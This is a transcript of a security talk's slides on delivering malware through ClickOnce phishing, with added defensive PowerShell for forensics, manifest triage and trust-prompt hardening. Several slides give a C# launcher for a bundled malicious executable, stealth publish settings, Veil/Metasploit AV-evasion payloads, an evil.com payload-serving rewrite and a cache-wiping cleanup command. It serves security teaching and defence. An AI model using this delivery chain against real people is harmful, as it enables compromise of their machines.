All You Need Is One - A ClickOnce Love Story
Transcript of All You Need Is One - A ClickOnce Love Story
![Page 1: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/1.jpg)
All You Need Is One - A ClickOnce Love Story
![Page 2: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/2.jpg)
Introduction
• Ryan Gandrud ‒ Senior Security Consultant
  ‒ Penetration tester
  ‒ Phishing service lead
  ‒ Computer enthusiast
![Page 3: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/3.jpg)
Overview
• ClickOnce?
• Phishing-phriendly pheatures
• Creating a malicious ClickOnce application
• Phishing server setup
• Issues and pitfalls
• Demo
• Prevention
![Page 4: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/4.jpg)
ClickOnce WTF?
• ClickOnce – What is it?
  ‒ Executable wrapper
  ‒ Used to deploy installations
  ‒ Supports multiple deployment methods
![Page 5: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/5.jpg)
ClickOnce Internals
• ProjectName.application
  ‒ Used to launch ClickOnce
  ‒ Contains the location of the manifest and application version information
• ProjectName.exe.config.deploy
  ‒ Contains application settings (e.g. connection strings, supported runtimes, etc.)
• ProjectName.exe.deploy
  ‒ The (potentially malicious) executable that will be run by a user
• ProjectName.exe.manifest
  ‒ Manifest file containing application version, .NET versions supported, permission level requested, and signatures for the other files
  ‒ Contains the file name for the executable
![Page 6: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/6.jpg)
ClickOnce Certificate Signing
• Authenticode
  ‒ Microsoft cert-based signing technology
• Necessary to “acquire” a code-signing Authenticode certificate from a Certificate Authority (CA)
• Signing stages available
  ‒ Signed (CA)
  ‒ Self-signed (MakeCert.exe in .NET)
  ‒ Unsigned (No cert used)
![Page 7: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/7.jpg)
ClickOnce Trust Architecture
• Based on different execution source zones
• Allows permitted applications to elevate privileges automatically (Trusted Sites) or through prompting the user
• Prompting levels are controlled by the following registry key
  ‒ \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel
![Page 8: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/8.jpg)
ClickOnce Trust Architecture (cont.)
• These are features:
  ‒ "But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator"
  ‒ “If the application permissions don't exceed policy permissions, the application downloads and runs without asking the user any trust questions.”
  ‒ “If the application needs more permissions than what's granted by policy, the user is asked if he wants to trust that application and elevate permissions... If the user clicks Run, the application is put into the Application Trust List and is downloaded and started.”
![Page 9: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/9.jpg)
ClickOnce Trust Architecture (cont.)
• Original trust zone configuration during ClickOnce Beta
![Page 10: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/10.jpg)
ClickOnce Trust Architecture (cont.)
• Modified trust architecture now in production
• Unsigned applications from the Internet zone now prompt the user to elevate permissions
![Page 11: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/11.jpg)
Owning With a Click
• Why use a ClickOnce application?
  ‒ Supported on all modern Windows operating systems since it relies on .NET
  ‒ .NET supports backwards compatibility within its own major version
  ‒ Dead simple to write (C#)
  ‒ Public browser exploits are highly version specific and, more often than not, crash the victim’s browser
![Page 12: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/12.jpg)
Owning With a Click (cont.)
• Originally meant to be deployed using Windows Internet Explorer
  ‒ Supported by IE 6.0+
  ‒ Supported by Firefox and Chrome using third party addons (.NET 3.5+)
• Minimizes user interaction
• Delivers malicious code through multiple options
  ‒ It’s a .NET project – write your own
  ‒ Include malicious executable as a resource
![Page 13: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/13.jpg)
Payloads
• Roll your own payload
  ‒ Original vector
  ‒ Flagged by AV
• Standard Metasploit payload
  ‒ Reverse_HTTPS returned broken shells
![Page 14: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/14.jpg)
Payloads (cont.)
• PowerShell
  ‒ Justin@sixdub follow up
   • Great explanation about using PowerShell commands within ClickOnce
  ‒ Pros:
   • PowerShell command runs in memory – never touches disk
   • AV evasion
  ‒ Cons:
   • Difficulty in changing payloads
   • ClickOnce is already on disk
![Page 15: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/15.jpg)
Payloads (cont.)
• Veil-Evasion
  ‒ Pros:
   • Payloads written in different languages
   • Encrypted payloads
  ‒ Cons:
   • Static “random” Meterpreter callback
   • Issue with how Metasploit handles stagers
   • Fixed with release of stageless Meterpreter
![Page 16: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/16.jpg)
Payloads (cont.)
• Problem:
  ‒ Static Meterpreter callbacks from targets
• Solution?:
  ‒ Dynamically generating individualized Veil payloads
![Page 17: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/17.jpg)
Creating a ClickOnce Application
• Visual Studio is used to create ClickOnce applications
  ‒ The community edition of Visual Studio 2015 supports ClickOnce publishing
• Start a new console application project within Visual Studio
![Page 18: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/18.jpg)
Creating a ClickOnce Application (cont.)
• Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe)

```csharp
static class Program
{
    static void Main()
    {
        // Starting a new process executing the malicious exe
        System.Diagnostics.Process p = new System.Diagnostics.Process();
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.RedirectStandardOutput = false;
        p.StartInfo.FileName = "ClickOnceInc.exe";
        p.Start();
    }
}
```
![Page 19: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/19.jpg)
Creating a ClickOnce Application (cont.)
• Ensure that your application uses the correct version of .NET so the application runs properly.
  ‒ Windows 7 – 3.5.1 + 2.0
  ‒ Windows 8 – 4.5
  ‒ Windows 8.1 – 4.5.1
  ‒ Windows 10 – 4.6
• Here, .NET 4.0 was chosen by navigating to the Application tab on the left, and selecting the Target Framework from the dropdown.
![Page 20: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/20.jpg)
Creating a ClickOnce Application (cont.)
![Page 21: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/21.jpg)
Creating a ClickOnce Application (cont.)
• Include your malicious binary in the project by dragging it onto your Solution Explorer
![Page 22: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/22.jpg)
Creating a ClickOnce Application (cont.)
• In the Properties of the application under Publish:
  ‒ Ensure the Install Mode is set to “available online only”
   • This prevents the application from showing up in the Start Menu
  ‒ Clicking the Application Files… button
   • Exclude the hash for the ClickOnceInc.exe
   • Dynamic payload generation changes the hash
![Page 23: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/23.jpg)
Creating a ClickOnce Application (cont.)
![Page 24: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/24.jpg)
Creating a ClickOnce Application (cont.)
• Clicking the Publish button, follow the wizard to publish the ClickOnce application to your local drive
• Should create multiple files/directories
  ‒ Application Files directory
  ‒ Demo.application
  ‒ Publish.htm
  ‒ Setup.exe
![Page 25: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/25.jpg)
Creating a ClickOnce Application (cont.)
![Page 26: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/26.jpg)
Server Setup
• Web server
  ‒ Kali (2.0) with Veil, Metasploit, and Apache
• Apache mod_rewrite
  ‒ GET evil.com?u={ID} -> evil.com/{ID}/evil.application
  ‒ Combined with dynamic Veil payloads, allowed easy analytics and post-mortem data gathering.
![Page 27: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/27.jpg)
Callback Listener
• Metasploit listener
  ‒ Phishing scenario – targets are workstations
  ‒ Most likely have outbound http access
  ‒ Limited window of engagement
![Page 28: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/28.jpg)
Pitfalls
• Outdated packages / dependencies
  ‒ Veil, Python, Wine.
• Signing restrictions
  ‒ No signing allowed with dynamic payloads
• No easy way to use mage.exe on Linux
  ‒ Self-signed certs are only marginally better
![Page 29: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/29.jpg)
Cleanup
• ClickOnce install directory:
  ‒ %LOCALAPPDATA%\Apps\2.0\{machine-specific}\{machine-specific}\{obfuscated-app-name}
   • C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-folder}
![Page 30: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/30.jpg)
Cleanup
• Add/Remove Programs
• Delete relevant AppData folder
• Nuke everything:
  ‒ Note: This will clear the entire online application cache.
  ‒ No need for elevated privileges, AppCaches are user-specific.

```cmd
rundll32 dfshim CleanOnlineAppCache
```
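From the responder's side, the two Cleanup slides describe exactly the evidence that disappears when the cache is cleared. The PowerShell below is an added forensic helper, not part of the talk, that inventories the per-user ClickOnce cache under `%LOCALAPPDATA%\Apps\2.0` (manifests, `.application` files and binaries, each with size, timestamp and SHA-256) so the state can be recorded before any cleanup is run. The function name, the `-CacheRoot` parameter and the file filters are this example's own choices; the cache location itself is the one the slide gives.

```powershell
# Added forensic helper (not from the talk). Inventories the per-user ClickOnce
# cache the slide describes so its contents are recorded before any cleanup:
# the talk's "rundll32 dfshim CleanOnlineAppCache" wipes the online cache.
function Get-ClickOnceCacheInventory {
    param(
        # Root of the ClickOnce cache for the current user ($env:LOCALAPPDATA is
        # the talk's %LOCALAPPDATA%); override it to point at a mounted image.
        [string]$CacheRoot = (Join-Path $env:LOCALAPPDATA 'Apps\2.0')
    )
    if (-not (Test-Path $CacheRoot)) {
        Write-Verbose "No ClickOnce cache at $CacheRoot"
        return
    }
    # Deployed binaries live in obfuscated per-application folders; the cache also
    # keeps copies of the deployment (.application) and application (.manifest) files.
    Get-ChildItem -Path $CacheRoot -Recurse -File -ErrorAction SilentlyContinue `
        -Include '*.exe', '*.dll', '*.manifest', '*.application' |
        ForEach-Object {
            [pscustomobject]@{
                File          = $_.Name
                Folder        = $_.DirectoryName
                SizeBytes     = $_.Length
                LastWriteTime = $_.LastWriteTime
                Sha256        = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        }
}

# Usage: capture the inventory (pipe to Export-Csv to keep it with the case notes)
# before deciding whether to clear the cache or delete the AppData folder.
Get-ClickOnceCacheInventory |
    Sort-Object LastWriteTime -Descending |
    Format-Table File, SizeBytes, LastWriteTime, Sha256, Folder -AutoSize
```

The hashes are what make the inventory useful afterwards: a `.exe.deploy` pulled from the phishing server, or the `ClickOnceInc.exe` the talk bundles as a resource, can be matched against this list even after the cache has been cleaned on the host.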
![Page 31: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/31.jpg)
Demo
• Client:
  ‒ Windows 10
• Server (hack.me):
  ‒ Kali 2.0 running Apache to serve file
  ‒ Metasploit listener running to catch callback
![Page 32: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/32.jpg)
Preventative Measures
• Typical Anti-Phishing Techniques In Place
  ‒ User education
  ‒ Endpoint protection
  ‒ Least privileged configurations
• Helpful, but not effective enough
![Page 33: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/33.jpg)
Preventative Measures
• ClickOnce-Specific Techniques
  ‒ Code Access Security
   • ClickOnce applications can specify a “permissions level”
   • Default: Full Trust – Requires prompt for elevation
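The permission level this slide mentions, the signature status from the Certificate Signing slide, and the per-file hashes from the ClickOnce Internals and Application Files slides are all readable from the `.exe.manifest` file itself. The PowerShell below is an added triage function, not part of the talk, that parses a ClickOnce application manifest and reports the entry point, whether full trust (an unrestricted `PermissionSet`) is requested, whether an XML-DSig `Signature` element (Authenticode signing) is present, and which shipped files carry no hash. The manifest in `$SampleManifest` is constructed for this example with placeholder digest values; its element and namespace names follow the asm.v1/asm.v2 manifest schema, and the function name is this example's own.

```powershell
# Added triage helper (not from the talk): summarizes what a ClickOnce application
# manifest asks for, so an analyst can check the traits the talk relies on.
# $SampleManifest is a constructed, trimmed-down manifest with placeholder digests.
$SampleManifest = @'
<asmv1:assembly manifestVersion="1.0"
    xmlns:asmv1="urn:schemas-microsoft-com:asm.v1"
    xmlns="urn:schemas-microsoft-com:asm.v2"
    xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
  <asmv1:assemblyIdentity name="Demo.exe" version="1.0.0.0" processorArchitecture="msil" type="win32" />
  <entryPoint>
    <assemblyIdentity name="Demo" version="1.0.0.0" processorArchitecture="msil" />
    <commandLine file="Demo.exe" parameters="" />
  </entryPoint>
  <trustInfo>
    <security>
      <applicationRequestMinimum>
        <PermissionSet Unrestricted="true" ID="Custom" SameSite="site" />
        <defaultAssemblyRequest permissionSetReference="Custom" />
      </applicationRequestMinimum>
    </security>
  </trustInfo>
  <dependency>
    <dependentAssembly dependencyType="install" codebase="Demo.exe" size="5632">
      <assemblyIdentity name="Demo" version="1.0.0.0" processorArchitecture="msil" />
      <hash>
        <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
        <dsig:DigestValue>PLACEHOLDER_DIGEST_FOR_DEMO_EXE=</dsig:DigestValue>
      </hash>
    </dependentAssembly>
  </dependency>
  <!-- Bundled binary shipped without a hash element, as the "exclude the hash" publish step produces -->
  <file name="ClickOnceInc.exe" size="73802" />
</asmv1:assembly>
'@

function Get-ClickOnceManifestSummary {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$ManifestXml)

    [xml]$doc = $ManifestXml
    $ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
    $ns.AddNamespace('v1',   'urn:schemas-microsoft-com:asm.v1')
    $ns.AddNamespace('v2',   'urn:schemas-microsoft-com:asm.v2')
    $ns.AddNamespace('dsig', 'http://www.w3.org/2000/09/xmldsig#')

    $entry   = $doc.SelectSingleNode('/v1:assembly/v2:entryPoint/v2:commandLine', $ns)
    $permSet = $doc.SelectSingleNode('/v1:assembly/v2:trustInfo/v2:security/v2:applicationRequestMinimum/v2:PermissionSet', $ns)
    # An Authenticode-signed manifest carries an XML-DSig Signature element at the root.
    $signed  = $null -ne $doc.SelectSingleNode('/v1:assembly/dsig:Signature', $ns)

    # Every shipped file should be covered by a hash; collect the ones that are not.
    $unhashed = foreach ($item in $doc.SelectNodes('//v2:file | //v2:dependentAssembly', $ns)) {
        if ($null -eq $item.SelectSingleNode('v2:hash/dsig:DigestValue', $ns)) {
            if ($item.LocalName -eq 'file') { $item.GetAttribute('name') } else { $item.GetAttribute('codebase') }
        }
    }

    [pscustomobject]@{
        EntryPoint         = if ($entry) { $entry.GetAttribute('file') } else { $null }
        RequestsFullTrust  = ($null -ne $permSet) -and ($permSet.GetAttribute('Unrestricted') -eq 'true')
        AuthenticodeSigned = $signed
        UnhashedFiles      = @($unhashed)
    }
}

# Usage: run it over the constructed sample (or over Get-Content -Raw of a real .exe.manifest).
Get-ClickOnceManifestSummary -ManifestXml $SampleManifest | Format-List
```

On the constructed sample the summary shows the `Demo.exe` entry point, a full-trust request, no signature, and `ClickOnceInc.exe` as the file with no hash: the unsigned, full-trust, partially hashed combination is the one that produces the Internet-zone trust prompt the talk depends on, and it is a reasonable first filter for `.exe.manifest` files recovered from a mail gateway, proxy logs or the cache.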
![Page 34: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/34.jpg)
Preventative Measures
• Disabling Trust Prompt
  ‒ \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel
  ‒ Trust prompt is controlled by zone
   • Untrusted Sites
   • Internet
   • My Computer
   • Local Intranet
   • Trusted Sites
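The PowerShell below is an added hardening helper, not part of the talk, for the registry key this slide names. Under `PromptingLevel` each zone is a string value (`MyComputer`, `LocalIntranet`, `Internet`, `TrustedSites`, `UntrustedSites`) whose data is `Enabled`, `Disabled` or `AuthenticodeRequired`; the first function reports the current state per zone, the second sets one zone and honours `-WhatIf`. The function names and the `(not set)` marker for an absent value are this example's own.

```powershell
# Added hardening helper (not from the talk). Audits and sets the per-zone
# ClickOnce trust prompt values under the registry key the slide names.
# Each zone is a REG_SZ value whose data is Enabled, Disabled or AuthenticodeRequired.
$PromptingLevelKey = 'HKLM:\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel'
$Zones = 'MyComputer', 'LocalIntranet', 'Internet', 'TrustedSites', 'UntrustedSites'

function Get-ClickOncePromptingLevel {
    # Reports the configured data for each zone, or '(not set)' where the value is
    # absent and the framework default applies.
    $props = if (Test-Path $PromptingLevelKey) { Get-ItemProperty -Path $PromptingLevelKey } else { $null }
    foreach ($zone in $Zones) {
        $value = if ($props -and $props.PSObject.Properties[$zone]) { $props.$zone } else { '(not set)' }
        [pscustomobject]@{ Zone = $zone; PromptingLevel = $value }
    }
}

function Set-ClickOncePromptingLevel {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][ValidateSet('MyComputer', 'LocalIntranet', 'Internet', 'TrustedSites', 'UntrustedSites')]
        [string]$Zone,
        [Parameter(Mandatory)][ValidateSet('Enabled', 'Disabled', 'AuthenticodeRequired')]
        [string]$Level
    )
    # The key lives under HKLM, so this needs an elevated session.
    if ($PSCmdlet.ShouldProcess("$PromptingLevelKey\$Zone", "set to $Level")) {
        if (-not (Test-Path $PromptingLevelKey)) { New-Item -Path $PromptingLevelKey -Force | Out-Null }
        Set-ItemProperty -Path $PromptingLevelKey -Name $Zone -Value $Level -Type String
    }
}

# Usage: review the current state, then remove the Internet-zone prompt the talk
# relies on (drop -WhatIf to apply). Disabled blocks an app that needs more
# permissions than policy grants without prompting; AuthenticodeRequired prompts
# only when the app is Authenticode-signed.
Get-ClickOncePromptingLevel | Format-Table -AutoSize
Set-ClickOncePromptingLevel -Zone Internet -Level Disabled -WhatIf
```

Setting `Internet` (and `UntrustedSites`) to `Disabled` or `AuthenticodeRequired` is the control that directly counters the deck's delivery path: an unsigned full-trust application served from an Internet-zone URL is then blocked instead of asking the user, while applications already trusted by policy or from a trusted publisher continue to run.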
![Page 35: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/35.jpg)
Preventative Measures
![Page 36: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/36.jpg)
Preventative Measures
• Windows 8/10
  ‒ SmartScreen Filter
   • Enabled by default
   • Default ‘OK’ action results in the application not running
![Page 37: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/37.jpg)
![Page 38: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/38.jpg)
Questions?
![Page 39: All You Need Is One - A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/39.jpg)
More Information / References
• Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness
  ‒ Devdatta Akhawe, University of California, Berkeley
  ‒ Adrienne Porter Felt, Google, Inc.
• http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/
• https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx
• https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx
• https://msdn.microsoft.com/en-us/library/ee308453.aspx
• https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive-answer-2/
• https://blog.netspi.com/bypassing-av-with-veil-evasion/
• https://github.com/rapid7/metasploit-framework/issues/4895
• http://www.sixdub.net/?p=555